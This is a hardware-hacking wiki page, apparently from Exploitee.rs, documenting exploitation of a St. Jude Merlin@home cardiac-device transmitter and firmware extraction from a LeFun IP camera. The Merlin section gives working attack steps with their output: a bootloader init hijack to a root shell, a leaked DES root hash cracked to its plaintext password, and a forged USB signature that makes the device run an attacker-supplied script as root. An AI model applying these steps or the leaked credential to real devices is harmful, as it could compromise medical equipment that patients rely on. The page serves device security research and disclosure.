The Merlin@home Transmitter is intended to pair with an Implantable Cardiac Defibrillator (ICD) or Pacemaker and upload the data to the Merlin.net patient care network for review by a physician.<br />
<br />
== Disassembly ==<br />
<gallery><br />
File:Merlin-front.jpg<br />
File:Merlin-back.jpg<br />
File:Merlin-side_usb.jpg<br />
File:Merlin-antenna1.jpg<br />
File:Merlin-antenna2.jpg<br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A Login Console is presented on UART (3.3v) at 115200 baud. The pinout for UART can be found below.<br />
<br />
<gallery><br />
File:Merlin-uart.jpg<br />
File:Merlin-uart2.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
This device boots with the BLOB bootloader (https://sourceforge.net/projects/blob/) to a version of Montavista Linux (https://en.wikipedia.org/wiki/MontaVista) with a restricted root login. It is possible to init hijack by interrupting the bootloader.<br />
<br />
<pre>Post device verification...<br />
Serial2In string: ATi0<br />
Serial2In string: <br />
56000<br />
Modem Post : Passed with retries = 0<br />
<br />
Time taken by POST : [1.197000] seconds<br />
nand_init: manuf=0x000000EC device=0x000000F1<br />
scanning for bad blocks...<br />
nand_check_blocks: nand_read_page() failed, addr=0x02B40000<br />
nand_check_blocks: nand_read_page() failed, addr=0x04B20000<br />
nand_check_blocks: nand_read_page() failed, addr=0x07660000<br />
<br />
Consider yourself BLOBed!<br />
<br />
blob version 2.0.5-pre2 for Tanto Basic Device<br />
Copyright (C) 1999 2000 2001 Jan-Derk Bakker and Erik Mouw<br />
blob comes with ABSOLUTELY NO WARRANTY; read the GNU GPL for details.<br />
This is free software, and you are welcome to redistribute it<br />
under certain conditions; read the GNU GPL for details.<br />
blob release: d20081014_platform_4_16<br />
Memory map:<br />
0x02000000 @ 0xc0000000 (32 MB)<br />
<br />
ram_post executing...<br />
Data Bus Test<br />
Address Bus Test<br />
Data Qualifer Test<br />
Device Test<br />
c0200000status_next, board type = RF board revision = (3)<br />
c1e00000r14_svc = 0x0000034d<br />
Autoboot in progress, press any key to stop ..<br />
Autoboot aborted<br />
Type "help" to get a list of commands<br />
blob> boot console=ttyMX0,115200n8 root=/dev/mtdblock6 ip=dhcp init=/bin/sh BOARD_REVISION=<br />
</pre><br />
<br />
We can pull some useful information from the device.<br />
<br />
<pre>sh-2.05a# cat /etc/passwd<br />
root:0q8h1Maw1oYAU:0:0:root:/root:/bin/bash<br />
bin:*:1:1:bin:/bin:<br />
daemon:*:2:2:daemon:/usr/sbin:<br />
sys:*:3:3:sys:/dev:<br />
adm:*:4:4:adm:/var/adm:<br />
lp:*:5:7:lp:/var/spool/lpd:<br />
sync:*:6:8:sync:/bin:/bin/sync<br />
shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown<br />
halt:*:8:10:halt:/sbin:/sbin/halt<br />
mail:*:9:11:mail:/var/spool/mail:<br />
news:*:10:12:news:/var/spool/news:<br />
uucp:*:11:13:uucp:/var/spool/uucp:<br />
operator:*:12:0:operator:/root:<br />
games:*:13:100:games:/usr/games:<br />
ftp:*:15:14:ftp:/var/ftp:<br />
man:*:16:100:man:/var/cache/man:<br />
www:*:17:100:www:/var/www:<br />
sshd:*:18:100:sshd:/var/run/sshd:<br />
nobody:*:65534:65534:nobody:/home:/bin/sh<br />
sh-2.05a# cat /etc/shadow<br />
cat: /etc/shadow: No such file or directory</pre><br />
<br />
Lets break this.<br />
<br />
<pre>E:\hashcat-3.5.0>hashcat64.exe --session sjm_hash -w 3 -m 1500 e:\sjm_hash -a 3 ?a?a?a?a?a?a?a<br />
hashcat (v3.5.0) starting...<br />
<br />
* Device #1: WARNING! Kernel exec timeout is not disabled.<br />
This may cause "CL_OUT_OF_RESOURCES" or related errors.<br />
To disable the timeout, see: https://hashcat.net/q/timeoutpatch<br />
OpenCL Platform #1: NVIDIA Corporation<br />
======================================<br />
* Device #1: GeForce GTX 980, 1024/4096 MB allocatable, 16MCU<br />
<br />
OpenCL Platform #2: Intel(R) Corporation<br />
========================================<br />
* Device #2: Intel(R) Core(TM) i5-4570 CPU @ 3.20GHz, skipped.<br />
<br />
Hashes: 1 digests; 1 unique digests, 1 unique salts<br />
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates<br />
<br />
Applicable optimizers:<br />
* Zero-Byte<br />
* Precompute-Final-Permutation<br />
* Not-Iterated<br />
* Single-Hash<br />
* Single-Salt<br />
* Brute-Force<br />
<br />
Watchdog: Temperature abort trigger set to 90c<br />
Watchdog: Temperature retain trigger set to 75c<br />
<br />
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =><br />
<br />
0q8h1Maw1oYAU:mah1200<br />
<br />
Session..........: sjm_hash<br />
Status...........: Cracked<br />
Hash.Type........: descrypt, DES (Unix), Traditional DES<br />
Hash.Target......: 0q8h1Maw1oYAU<br />
Time.Started.....: Sun May 07 17:39:55 2017 (9 secs)<br />
Time.Estimated...: Sun May 07 17:40:04 2017 (0 secs)<br />
Guess.Mask.......: ?a?a?a?a?a?a?a [7]<br />
Guess.Queue......: 1/1 (100.00%)<br />
Speed.Dev.#1.....: 544.7 MH/s (60.44ms)<br />
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts<br />
Progress.........: 4764729344/69833729609375 (0.01%)<br />
Rejected.........: 0/4764729344 (0.00%)<br />
Restore.Point....: 0/81450625 (0.00%)<br />
Candidates.#1....: ;~9anan -> $sb~{ka<br />
HWMon.Dev.#1.....: Temp: 67c Fan: 33% Util: 99% Core:1404MHz Mem:3004MHz Bus:16<br />
<br />
Started: Sun May 07 17:39:51 2017<br />
Stopped: Sun May 07 17:40:05 2017</pre><br />
<br />
Attempts to login as root fail, what was going on with that operator user?<br />
<br />
<pre>operator:*:12:0:operator:/root:</pre><br />
<br />
Lets set the password to "test" and attempt logging in.<br />
<br />
<pre>sh-2.05a# grep "operator" /etc/passwd<br />
operator:dPUvQFLH8...A:12:0:operator:/root:</pre><br />
<br />
<pre>[SJM_CONFIGURATION]<br />
VERSION=EX2000 v6.1B PR_6.56<br />
(none) login: root<br />
Password: <br />
Login incorrect<br />
2017-05-14 <br />
(none) login: operator<br />
Password: <br />
operator@(none):~$ whoami<br />
operator<br />
operator@(none):~$ su root<br />
Password: <br />
PAM_unix[266]: (su) session opened for user root by (uid=12)<br />
root@(none):~# whoami<br />
root<br />
root@(none):~# </pre><br />
<br />
== Taking Things Further ==<br />
<br />
Lets look at some of these custom hotplug scripts. /etc/hotplug/usb/sjmusb looks like a good start.<br />
<br />
<pre>#!/bin/bash<br />
#<br />
# Script to mount valid sjm pendrive(s) via hotplug. Hotplug will invoke <br />
# this script only if the attached USB device is a mass-storage device.<br />
# hotplug does this by looking at the device class of the attached usb device<br />
# See /etc/hotplug/usb.usermap. The device class for mass storage devices<br />
# is ______<br />
# <br />
# In a nutshell, the script looks in /proc/scsi/usb-storage* directory to<br />
# find the scsi ID of the attached USB storage device. It then goes on to<br />
# find the device node corresponding to this scsi ID.<br />
# <br />
# version 1.1 - Added USB signature check functionality <br />
#<br />
# For the new cellular adapters - viz mobidata and velocity, ignore the<br />
# mass storage interface reported. Please see comments at the top of<br />
# /etc/hotplug/usb/velocity for details.<br />
#<br />
# - Ashok Iyer (16-Jun-2010)<br />
#<br />
<br />
export PATH=/usr/bin:/usr/local/bin:$PATH<br />
<br />
MOUNT_PATH="/mnt/sjmpendrives"<br />
MOUNT_NUMBER=1<br />
LOG_FILE="/tmp/usbstorage.log"<br />
SGMAP="sg_map"<br />
<br />
<br />
# The functions in this script rely on "echo" to pass information to each<br />
# other. If you need to modify this script, do not use "echo" for debugging.<br />
# Instead use the feedback()/error_exit() functions below. These will log <br />
# information to a log file and do not interfere with information passing <br />
# between functions.<br />
<br />
***snip***<br />
<br />
function check_sign {<br />
local node1=$1"1"<br />
feedback "Checking signature ... "<br />
feedback "node1 = $node1"<br />
dd if=$node1 of=/tmp/.sign bs=1 count=3 skip=501<br />
signature=`cat /tmp/.sign` <br />
<br />
if [ "$signature" = "SJM" ]; then<br />
feedback "Valid pendrive"<br />
echo 0<br />
else<br />
feedback "Invalid pendrive"<br />
echo -1<br />
fi<br />
}<br />
<br />
***snip***<br />
<br />
# We only mount the first partition of a USB storage device. There is no <br />
# requirement to mount multiple partitions. Makes the job easy :-)<br />
function mount_scsi_dev {<br />
local scsi_dev=$1<br />
local mountpt=""<br />
<br />
# check if the first partition of the device is mounted <br />
if ! mount | egrep -q "^$scsi_dev"1"[[:space:]]" <br />
then<br />
mountpt=$(find_unused_mountpt) || error_exit "Failed to find a mount pt"<br />
mkdir -p "$mountpt" || error_exit "Failed to create mount pt $mountpt"<br />
<br />
# FIXME- Ugly hack to detect partitions on USB flash drive<br />
# Possible bug in Kernel and/or devfs. Either use devfs=nomount kernel cmdline<br />
# or fix devfs once and for all.<br />
# There is another problem in devfs that after the USB flash disk is removed<br />
# the corresponding devfs partitions (part1, part2 etc...) still show up. <br />
foobar=`ls -l $scsi_dev | awk '{print $11}'`<br />
dd if=/dev/$foobar of=/dev/null bs=1 count=1 <br />
<br />
# Checking USB signature<br />
ret=`check_sign $scsi_dev` <br />
if [ $ret -eq 0 ]; then<br />
feedback "Valid pendrive"<br />
else<br />
# Tanto: Inform the Exec App to show <br />
# an Invalid Media Error<br />
if [ -p /tmp/remoteInt.pipe ]; then<br />
echo "UsbHotplug InvalidMedia" > /tmp/remoteInt.pipe<br />
error_exit "Invalid pendrive"<br />
else<br />
echo "ERROR: /tmp/remoteInt.pipe does not exist!!!"<br />
fi<br />
fi<br />
<br />
feedback "Mounting $scsi_dev"1" on $mountpt"<br />
mount -t auto $scsi_dev"1" $mountpt<br />
if [ "$?" -eq 0 ]; then<br />
feedback "$scsi_dev"1" is now mounted on $mountpt"<br />
feedback "Launch application specific script" <br />
sh /etc/launch_appln.sh $mountpt<br />
else<br />
feedback "Mount error for $scsi_dev"<br />
fi<br />
else<br />
feedback "Ignoring $scsi_dev - already mounted"<br />
fi<br />
}<br />
<br />
# Find and mount all attached USB storage devices<br />
function mount_all_attached {<br />
local scsiuniqid=""<br />
feedback "Find and mount all attached usb storage devices"<br />
<br />
for scsiuniqid in $(allusb_scsiuniqid)<br />
do<br />
local scsidev="`diskdev_from_uniqid $scsiuniqid`"<br />
if [ "$scsidev" == "UNKNOWN" ]; then<br />
sleep 1<br />
fi<br />
mount_scsi_dev $scsidev<br />
done<br />
}<br />
<br />
***snip***<br />
<br />
<br />
# The remover script will be invoked when the device is removed. This is<br />
# useless in a way because umount will have no effect. The only benefit is<br />
# that the "mount" command will not show stale entries.<br />
<br />
# FIXME - Need to add specialized LOGIC to selectively umount USB flash drive <br />
# which is removed ( unlike umounting all attached USB flash drives )<br />
feedback "REM = $REMOVER"<br />
if [ -f $REMOVER ]; then<br />
echo '/bin/umount /mnt/sjmpendrives/*' >> $REMOVER<br />
else<br />
echo -e '#!/bin/sh\n/bin/umount /mnt/sjmpendrives/*' > $REMOVER<br />
fi<br />
<br />
# Inform the Export data script when pendrive is unplugged.<br />
echo -e '\nps -A | grep export_data \nif [ $? -eq 0 ]; then \n\tif [ -p /tmp/usbDataExport.pipe ]; then \n\t\t echo "Hotplug umount" > /tmp/usbDataExport.pipe \n\tfi\nfi' >> $REMOVER<br />
chmod a+x $REMOVER<br />
<br />
mount_all_attached</pre><br />
<br />
Lets look inside of /etc/launch_appln.sh<br />
<br />
<pre>#!/bin/sh<br />
<br />
if [ $# -ne 1 ]; then<br />
echo "usage: ./launch_appln.sh /mnt/pendrive"<br />
exit<br />
fi<br />
<br />
# FIXME <br />
# This script may be invoked by hotplug <br />
# Do not run the script if it is already running <br />
# updater or data export<br />
<br />
mountpt=$1<br />
script_path=/apps/tanto/<br />
<br />
if [ -f $mountpt/version.ini ]; then<br />
# call updater script<br />
echo "Launching updater script"<br />
if [ -f $mountpt/etc/init.d/upgrade_script.sh ]; then<br />
sh $mountpt/etc/init.d/upgrade_script.sh $mountpt > /tmp/debugUpdater.txt 2>&1<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
else<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
exit 0<br />
fi<br />
else<br />
# Call Data export script<br />
echo "Launching export data script"<br />
sh $script_path/export_data.sh $mountpt<br />
umount /mnt/sjmpendrives/1<br />
umount /mnt/pendrive<br />
fi</pre><br />
<br />
It looks like their pendrive "signature" is fairly easy to get around.<br />
<br />
<pre>rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00116472 s, 2.6 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 00 00 00 |...|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ hd .sign_mod<br />
00000000 53 4a 4d |SJM|<br />
00000003<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=.sign_mod bs=1 count=3 of=/dev/sdb1 bs=1 seek=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00700994 s, 0.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ sudo dd if=/dev/sdb1 of=/tmp/.sign bs=1 count=3 skip=501<br />
3+0 records in<br />
3+0 records out<br />
3 bytes copied, 0.00123249 s, 2.4 kB/s<br />
rjmendez@Reggie:~/stjude_merlin$ hd /tmp/.sign <br />
00000000 53 4a 4d |SJM|<br />
00000003</pre><br />
<br />
Adding the required files to the drive and a small script.<br />
<br />
<pre>rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ ls -lahR<br />
.:<br />
total 36K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 .<br />
drwxr-x---+ 8 root root 4.0K May 14 11:02 ..<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 etc<br />
-rw-r--r-- 1 rjmendez rjmendez 620 May 14 06:01 passwd<br />
-rw-r--r-- 1 rjmendez rjmendez 4 May 10 17:07 version.ini<br />
<br />
./etc:<br />
total 24K<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 14 11:04 ..<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 init.d<br />
<br />
./etc/init.d:<br />
total 24K<br />
drwxr-xr-x 2 rjmendez rjmendez 8.0K May 13 14:02 .<br />
drwxr-xr-x 3 rjmendez rjmendez 8.0K May 13 14:02 ..<br />
-rw-r--r-- 1 rjmendez rjmendez 771 May 13 18:27 upgrade_script.sh<br />
<br />
rjmendez@Reggie:/media/rjmendez/7A3B-B3C6$ cat etc/init.d/upgrade_script.sh <br />
#!/bin/sh<br />
function led_off {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b0<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_dim {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b1<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function led_bright {<br />
for i in `seq 0 7`;<br />
do<br />
ledControl -l$i -b2<br />
sleep 0.05<br />
done<br />
}<br />
<br />
function party_mode {<br />
counter=0<br />
while [ $counter -lt $1 ];<br />
do<br />
led_off<br />
sleep 0.05<br />
led_dim<br />
sleep 0.05<br />
led_bright<br />
sleep 0.05<br />
let counter=counter+1<br />
done<br />
}<br />
<br />
/etc/init.d/tantoapp stop<br />
#cp /mnt/sjmpendrives/1/passwd /etc/passwd<br />
echo "This worked!" > /root/diditwork.txt<br />
if [ -f /root/diditwork.txt ];<br />
then<br />
party_mode 15<br />
else<br />
echo "It did not work..."<br />
fi</pre><br />
<br />
This is the output that we get from the console.<br />
<br />
<pre>operator@(none):~$ su root<br />
Password: <br />
PAM_unix[265]: (su) session opened for user root by (uid=12)<br />
root@(none):~# hub.c: new USB device usb-mx2hci-2, assigned address 2<br />
scsi0 : SCSI emulation for USB Mass Storage devices<br />
Vendor: Lexar Model: USB Flash Drive Rev: 1100<br />
Type: Direct-Access ANSI SCSI revision: 02<br />
Attached scsi removable disk sda at scsi0, channel 0, id 0, lun 0<br />
SCSI device sda: 31285248 512-byte hdwr sectors (16018 MB)<br />
sda: Write Protect is off<br />
Partition check:<br />
/dev/scsi/host0/bus0/target0/lun0: p1<br />
modprobe: Can't locate module /dev/sg1<br />
modprobe: Can't locate module /dev/sg2<br />
modprobe: Can't locate module /dev/sg3<br />
modprobe: Can't locate module /dev/sg4<br />
modprobe: Can't locate module /dev/sg5<br />
modprobe: Can't locate module /dev/sdb<br />
modprobe: Can't locate module /dev/sdc<br />
modprobe: Can't locate module /dev/sdd<br />
modprobe: Can't locate module /dev/sde<br />
modprobe: Can't locate module /dev/sdf<br />
modprobe: modprobe: Can't locate module nls_cp437<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
modprobe: modprobe: Can't locate module nls_iso8859-1<br />
ls /root<br />
devel_install.sh diditwork.txt setdev.sh setlog.sh<br />
root@(none):~# cat /root/diditwork.txt <br />
This worked!<br />
root@(none):~# cat /tmp/usbstorage.log <br />
+++ Starting USB (un)mounter script for device /proc/bus/usb/001/002<br />
REM = /var/run/usb/%proc%bus%usb%001%002<br />
Find and mount all attached usb storage devices<br />
usb proc-fs yields SCSI host number=0 - suffix with zeroes (kernel 2.4)<br />
Use sgmap to match 0:0:0:0.<br />
Waiting for device id to appear...<br />
SCSI disk for 0:0:0:0 is /dev/sda<br />
Checking /mnt/sjmpendrives/1<br />
Mountpoint /mnt/sjmpendrives/1 is free<br />
Checking signature ... <br />
node1 = /dev/sda1<br />
Valid pendrive<br />
Valid pendrive<br />
Mounting /dev/sda1 on /mnt/sjmpendrives/1<br />
/dev/sda1 is now mounted on /mnt/sjmpendrives/1<br />
Launch application specific script</pre><br />
<br />
== Party Mode Demo ==<br />
{{#ev:youtube|cNcGebu8NRs}}</div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-antenna2.jpg&diff=2700File:Merlin-antenna2.jpg2017-05-14T19:05:50Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-antenna1.jpg&diff=2699File:Merlin-antenna1.jpg2017-05-14T19:05:22Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-side_usb.jpg&diff=2698File:Merlin-side usb.jpg2017-05-14T19:04:28Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-back.jpg&diff=2697File:Merlin-back.jpg2017-05-14T19:03:49Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-front.jpg&diff=2696File:Merlin-front.jpg2017-05-14T19:03:03Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-uart.jpg&diff=2695File:Merlin-uart.jpg2017-05-14T19:02:03Z<p>Rjmendez: Rjmendez uploaded a new version of &quot;File:Merlin-uart.jpg&quot;</p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-uart2.jpg&diff=2694File:Merlin-uart2.jpg2017-05-14T19:00:28Z<p>Rjmendez: Rjmendez uploaded a new version of &quot;File:Merlin-uart2.jpg&quot;</p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-uart2.jpg&diff=2693File:Merlin-uart2.jpg2017-05-14T18:55:48Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-uart.jpg&diff=2692File:Merlin-uart.jpg2017-05-14T18:39:59Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=File:Merlin-at-home-1.jpg&diff=2691File:Merlin-at-home-1.jpg2017-05-14T18:35:19Z<p>Rjmendez: </p>
<hr />
<div></div>Rjmendezhttps://www.Exploitee.rs/index.php?title=LeFun_Cloud_IPCam&diff=2683LeFun Cloud IPCam2017-04-21T02:06:50Z<p>Rjmendez: Created page with "__FORCETOC__ {{Disclaimer}} thumb Category:Cameras This page will be dedicated to a general overview, descriptions, and informatio..."</p>
<hr />
<div>__FORCETOC__<br />
{{Disclaimer}}<br />
[[File:Cloudipcam_store.png|100px|left|thumb]]<br />
[[Category:Cameras]]<br />
This page will be dedicated to a general overview, descriptions, and information related to the LeFun C1 wireless surveillance camera.<br />
<br />
== About ==<br />
The LeFun C1 wireless surveillance camera is a network (Wifi/Ethernet) camera w/ IR LEDs provided by LeFun and available on Amazon.com.<br />
<br />
<gallery><br />
File:Cloudipcam_front.jpg<br />
File:Cloudipcam_profile.jpg<br />
File:Cloudipcam_back.jpg<br />
</gallery><br />
<br />
== Disassembly ==<br />
The base of the camera is attached with four small phillips screws hidden under silicone rubber feet. Remove all four, the base and board should be open to you.<br />
<br />
<gallery><br />
File:Cloudipcam_bottom.jpg<br />
File:Cloudipcam_board.jpg<br />
</gallery><br />
<br />
== UART ==<br />
A Login Console is presented on UART (3.3v) at 38400 baud. The pinout for UART can be found below.<br />
<br />
<gallery><br />
File:Cloudipcam_UART_pins.jpg<br />
</gallery><br />
<br />
== Exploitation ==<br />
<br />
U-Boot is available on boot and can probably be init hijacked, thankfully there is a better option that does not require access to the internals.<br />
<br />
[[File:Cloudipcam_mxic25l12835f.jpg|100px|thumb]]<br />
<br />
The firmware on this model was not available for download elsewhere and I didn't feel like waiting on the firmware to download over the uart at 38.4k baud so we will resort to the hot air and minipro TL866CS. SPI flash model mxic25l12835f was removed and dumped, the issue I had was that from 0x0 to 0xC00000 every 4 bytes were swapped.<br />
<br />
'''Firmware Format'''<br />
<br />
Raw data from the chip has an interesting patern to it.<br />
<br />
From U-Boot<br />
<br />
<pre>=> md.b 0x02000000 130<br />
02000000: 47 4d 38 31 32 36 00 00 00 00 01 00 00 00 01 00 GM8126..........<br />
02000010: 00 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 ................<br />
02000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000030: 00 00 00 00 08 00 00 00 0c 00 00 00 18 00 00 00 ................<br />
02000040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
02000090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................<br />
020000f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa ..............U.<br />
02000100: fa f8 bb f0 ba ba e7 70 5a be 03 aa 0a ea ae ba .......pZ.......<br />
02000110: 22 f3 7a ff ba 2d 08 aa f7 aa 2a 3c fa bb aa 9e ".z..-....*<....<br />
02000120: 80 2e ea fd b9 ea c2 b5 ec ab 6a ba 8f aa ba ab ..........j.....</pre><br />
<br />
Dumped from the chip.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera$ hd cloudipcamera_mxic25l12835f.BIN | head -n 15<br />
00000000 31 38 4d 47 00 00 36 32 00 01 00 00 00 01 00 00 |18MG..62........|<br />
00000010 00 0b 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 |................|<br />
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
00000030 00 00 00 00 00 00 00 08 00 00 00 0c 00 00 00 18 |................|<br />
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
*<br />
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 aa 55 00 00 |.............U..|<br />
00000100 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|<br />
*<br />
00001000 80 5a 47 4d 00 00 00 00 00 00 29 18 00 00 00 00 |.ZGM......).....|<br />
00001010 6f 62 73 6e 62 2e 74 6f 00 00 6e 69 00 00 00 00 |obsnb.to..ni....|<br />
00001020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|<br />
*<br />
00001100 ea 00 00 0e e5 9f f0 14 e5 9f f0 14 e5 9f f0 14 |................|<br />
00001110 e5 9f f0 14 e1 a0 00 00 e5 9f f0 10 e5 9f f0 10 |................|</pre><br />
<br />
Lets reorder the bytes. <br />
<br />
<pre>objcopy -I binary -O binary --reverse-bytes=4 cloudipcamera_mxic25l12835f.BIN cloudipcamera_mxic25l12835f.BIN.swapped</pre><br />
<br />
Merging the two halves together gives us the entire image.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera$ binwalk cloudipcamera_mxic25l12835f.BIN.merged <br />
<br />
DECIMAL HEXADECIMAL DESCRIPTION<br />
--------------------------------------------------------------------------------<br />
809008 0xC5830 CRC32 polynomial table, little endian<br />
852224 0xD0100 Linux kernel ARM boot executable zImage (little-endian)<br />
865293 0xD340D gzip compressed data, maximum compression, from Unix, last modified: 2015-10-23 07:16:16<br />
12582912 0xC00000 JFFS2 filesystem, little endian</pre><br />
<br />
'''Filesystem'''<br />
<br />
The notable data includes the root filesystem.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls<br />
D340D D8B3E4 D8BA40 D8BF44 D8CE50 DC11AC DC15E4 DC1AF4 E7C814 E7CC44 ED5158 ED565C ED5BAC FB50C0 FFE67C jffs2-root-1 jffs2-root-3 jffs2-root-8<br />
_D340D.extracted D8B514 D8BC0C D8C670 D8CEFC DC12AC DC16E8 DC1BC0 E7C90C E7CD44 ED5324 ED5754 ED5CD8 FB51EC FFEAB0 jffs2-root-10 jffs2-root-4 jffs2-root-9<br />
D8B0BC D8B640 D8BD04 D8CBC4 D8D4E8 DC1340 DC180C E7C050 E7CA0C E7CE48 ED541C ED5854 ED5D64 FB5278 FFEDFC jffs2-root-11 jffs2-root-5<br />
D8B1BC D8B6CC D8BE04 D8CCBC D8E460 DC13EC DC193C E7C198 E7CAA0 E7CF6C ED551C ED5958 ED5E30 FB5344 jffs2-root jffs2-root-12 jffs2-root-6<br />
D8B2C0 D8B938 D8BE98 D8CDBC DC10B4 DC14E4 DC1A68 E7C5B0 E7CB4C ED5050 ED55B0 ED5A7C ED5F38 FFE230 jffs2-root-0 jffs2-root-2 jffs2-root-7<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/<br />
1A100 _1A100.extracted 9FD828<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/<br />
168.cpio cpio-root<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/<br />
bin dev etc init lib mnt proc project root sbin sys tmp usr var<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls _D340D.extracted/_1A100.extracted/cpio-root/root/<br />
welcome.txt<br />
rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ cat _D340D.extracted/_1A100.extracted/cpio-root/root/welcome.txt <br />
welcome to (c)shenzhen mining mipc world!<br />
enjoy it!</pre><br />
<br />
And the config storage.<br />
<br />
<pre>rjmendez@Reggie:~/cloudipcamera/extracted/_cloudipcamera_mxic25l12835f.BIN.merged.extracted$ ls jffs2-root/fs_1/ -R<br />
jffs2-root/fs_1/:<br />
dev_data ipc_data latest_dhcp_ip_eth0 system_data<br />
<br />
jffs2-root/fs_1/dev_data:<br />
system_config<br />
<br />
jffs2-root/fs_1/ipc_data:<br />
8188eu_ap_2G.conf aec_amr.xml ao0.xml buildinfo.xml io_alert.xml motion_alert.xml ntp_info.xml ptz0.xml RT2870AP.dat vec_half.xml vs0.xml<br />
action_conf.xml aec_g711.xml aoc0.xml data_version ipc_conf.xml motion_ex_alert.xml osd_show_time.xml ptz.xml RT2870STA_adhoc.dat vec_hd.xml vsc0.xml<br />
active_server.xml aec_g726.xml ap.conf default_gw.xml license.xml net_info.sh pass.mp ra0.xml RT2870STA_infra.dat vec_jpeg.xml<br />
aec_aac.xml alarm.xml as0.xml dps localtime net_info.xml pass.up recording_root.xml sd_conf.xml vec_min.xml<br />
aec_adpcm.xml alert_device_conf.xml asc3.xml eth0.xml mediainfo.xml nick_conf.xml proxy.xml recording_task.xml server.xml vec_normal.xml<br />
<br />
jffs2-root/fs_1/ipc_data/dps:<br />
cacs<br />
<br />
jffs2-root/fs_1/ipc_data/dps/cacs:<br />
61646d696e02<br />
<br />
jffs2-root/fs_1/system_data:</pre><br />
<br />
Theres also an archive in /project on the root filesystem.<br />
<br />
